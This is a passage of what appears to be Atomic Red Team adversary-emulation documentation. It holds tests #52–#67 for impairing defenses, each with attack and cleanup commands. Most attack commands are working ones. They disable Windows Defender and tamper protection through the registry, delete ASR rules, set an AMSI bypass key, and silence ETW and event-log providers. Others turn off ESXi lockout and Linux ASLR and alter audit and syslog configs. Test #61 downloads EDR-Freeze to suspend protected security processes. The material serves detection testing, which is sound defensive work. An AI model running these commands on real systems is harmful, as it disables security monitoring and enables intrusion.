reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
```
#### Cleanup Commands
```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
```
### Atomic Test #52: Tamper with Windows Defender Registry - Powershell
Disable Windows Defender by tampering with windows defender registry through powershell
**Supported Platforms:** Windows
**auto_generated_guid:** `a72cfef8-d252-48b3-b292-635d332625c3`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 0
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 0
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 0
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 0
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 0
```
#### Cleanup Commands
```powershell
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 1
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1
```
### Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI
An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
**Supported Platforms:** Linux
**auto_generated_guid:** `091a6290-cd29-41cb-81ea-b12f133c66cb`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-AdvancedSetting -Entity #{vm_host} -Name 'Security.AccountLockFailures' | Set-AdvancedSetting -Value '0' -Confirm:$false
Disconnect-VIServer -Confirm:$false
```
#### Dependencies: Run with `powershell`!
##### Description: Check if VMWARE PowerCLI PowerShell Module is installed.
###### Check Prereq Commands
```powershell
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
```
###### Get Prereq Commands
```powershell
Install-Module -Name VMware.PowerCLI -Confirm:$false
```
### Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.
**Supported Platforms:** Windows
**auto_generated_guid:** `eea0a6c2-84e9-4e8c-a242-ac585d28d0d1`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager"
if (-not (Test-Path $registryPath)) {
New-Item -Path $registryPath -Force
Write-Host "Registry key created: $registryPath"
}
$registryValueName = "ASRRules"
if (Test-Path "$registryPath\$registryValueName") {
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
} else {
New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value "36190899-1602-49e8-8b27-eb1d0a1ce869=1" -Force
Write-Host "Registry value created: $registryValueName"
}
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
```
### Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.
**Supported Platforms:** Windows
**auto_generated_guid:** `0e7b8a4b-2ca5-4743-a9f9-96051abb6e50`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"
if (-not (Test-Path $registryPath)) {
New-Item -Path $registryPath -Force
Write-Host "Registry key created: $registryPath"
}
$newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
$newValueData = "1"
New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
Write-Host "Registry value created: $newValueName with data $newValueData"
Remove-ItemProperty -Path $registryPath -Name $newValueName
Write-Host "Registry value deleted: $newValueName"
```
### Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key
Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0.
Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
**Supported Platforms:** Windows
**auto_generated_guid:** `728eca7b-0444-4f6f-ac36-437e3d751dc0`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name "AmsiEnable" -Value 0 -PropertyType DWORD -Force | Out-Null
```
#### Cleanup Commands
```powershell
Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null
```
### Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
**Supported Platforms:** Windows
**auto_generated_guid:** `653c6e17-14a2-4849-851d-f1c0cc8ea9ab`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "0" /f
```
#### Cleanup Commands
```cmd
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "1" /f
```
### Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
**Supported Platforms:** Windows
**auto_generated_guid:** `da86f239-9bd3-4e85-92ed-4a94ef111a1c`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 0 -PropertyType "DWord" -Force
```
#### Cleanup Commands
```powershell
New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 1 -PropertyType "DWord" -Force
```
### Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd
This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
**Supported Platforms:** Windows
**auto_generated_guid:** `1cac9b54-810e-495c-8aac-989e0076583b`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ETWProviderGUID | Microsoft-Windows-SenseIR ETW Provider GUID | string | {B6D775EF-1436-4FE6-BAD3-9E436319E218}|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "0" /f
```
#### Cleanup Commands
```cmd
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "1" /f
```
### Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell
This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
**Supported Platforms:** Windows
**auto_generated_guid:** `8f907648-1ebf-4276-b0f0-e2678ca474f0`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ETWProviderGUID | Microsoft-Windows-SenseIR ETW Provider GUID | string | {B6D775EF-1436-4FE6-BAD3-9E436319E218}|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 0 -PropertyType "DWord" -Force
```
#### Cleanup Commands
```powershell
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
```
### Atomic Test #61: Freeze PPL-protected process with EDR-Freeze
This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
**Supported Platforms:** Windows
**auto_generated_guid:** `cbb2573a-a6ad-4c87-aef8-6e175598559b`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| processName | PPL-protected process name to target | string | SecurityHealthService|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
# Enable SeDebugPrivilege
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class TokenAdjuster {
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TOKEN_PRIVILEGES {
public int PrivilegeCount;
public long Luid;
public int Attributes;
}
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
public const uint TOKEN_QUERY = 0x0008;
public static bool EnableSeDebugPrivilege() {
IntPtr hToken;
if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
return false;
long luid;
if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
return false;
TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
tp.PrivilegeCount = 1;
tp.Luid = luid;
tp.Attributes = SE_PRIVILEGE_ENABLED;
return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
}
}
"@
$result = [TokenAdjuster]::EnableSeDebugPrivilege()
if ($result) {
Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
} else {
Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
exit 1
}
# Get basic process info
$process = Get-Process -Name $#{processName} -ErrorAction Stop
$processName = $process.ProcessName
Write-Host "Process Name: $processName)"
Write-Host "PID: $($process.Id)"
# Get executable path and user info
$query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
$wmiProcess = Get-WmiObject -Query $query
$owner = $wmiProcess.GetOwner()
Write-Host "User: $($owner.Domain)\$($owner.User)"
# Get the folder of the current script
$scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
# Download latest EDR-Freeze package and extract (force replace)
$downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
$zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
try {
Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
Write-Host "Download completed: $zipPath" -ForegroundColor Green
$extractFolder = $scriptFolder
if (Test-Path $zipPath) {
Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
if (Test-Path $extractFolder) {
# Ensure target exe not locked; attempt to stop any running instance silently
Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
}
Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
# Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
$archive = $null
try {
$archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
foreach ($entry in $archive.Entries) {
if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
if ($entry.FullName.EndsWith('/')) { # directory entry
$dirPath = Join-Path $extractFolder $entry.FullName
if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
continue
}
$destPath = Join-Path $extractFolder $entry.FullName
$destDir = Split-Path $destPath -Parent
if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
try {
# Use static extension method (PowerShell 5.1 compatible)
[System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
} catch {
Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
}
}
Write-Host "Extraction completed." -ForegroundColor Green
} finally {
if ($archive) { $archive.Dispose() }
}
}
} catch {
Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
}
# Wait 15s before putting targeted process before putting it in the comma
Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 5
Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 5
Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 3
Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
Start-Sleep -Seconds 2
# Put targeted process in the comma for 15s
# Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
$edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
Sort-Object LastWriteTime -Descending |
Select-Object -First 1 -ExpandProperty Name
if (-not $edrFreezeExeName) {
Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
exit 1
}
$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
```
#### Cleanup Commands
```powershell
Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
Write-Output "File deleted: $edrFreezeExe"
```
### Atomic Test #62: Disable ASLR Via sysctl parameters - Linux
Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
**Supported Platforms:** Linux
**auto_generated_guid:** `ac333fe1-ce2b-400b-a117-538634427439`
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sysctl -w kernel.randomize_va_space=0
```
#### Cleanup Commands
```bash
sysctl -w kernel.randomize_va_space=2
```
### Atomic Test #63: Auditing Configuration Changes on Linux Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
```
#### Cleanup Commands
```bash
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
```
### Atomic Test #64: Auditing Configuration Changes on FreeBSD Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
```
#### Cleanup Commands
```sh
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
```
### Atomic Test #65: Logging Configuration Changes on Linux Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
#### Cleanup Commands
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
### Atomic Test #66: Logging Configuration Changes on FreeBSD Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
```
#### Cleanup Commands
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
```
### Atomic Test #67: Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
**Supported Platforms:** Windows
**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pstools&#92;PsExec.exe|
| session | The session to disable. | string | EventLog-Application|
| provider | The provider to disable. | string | Microsoft-Windows-Powershell|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
```
#### Cleanup Commands
```powershell
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
```
#### Dependencies: Run with `powershell`!
##### Description: PSExec must be installed on the machine.
###### Check Prereq Commands
```powershell
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
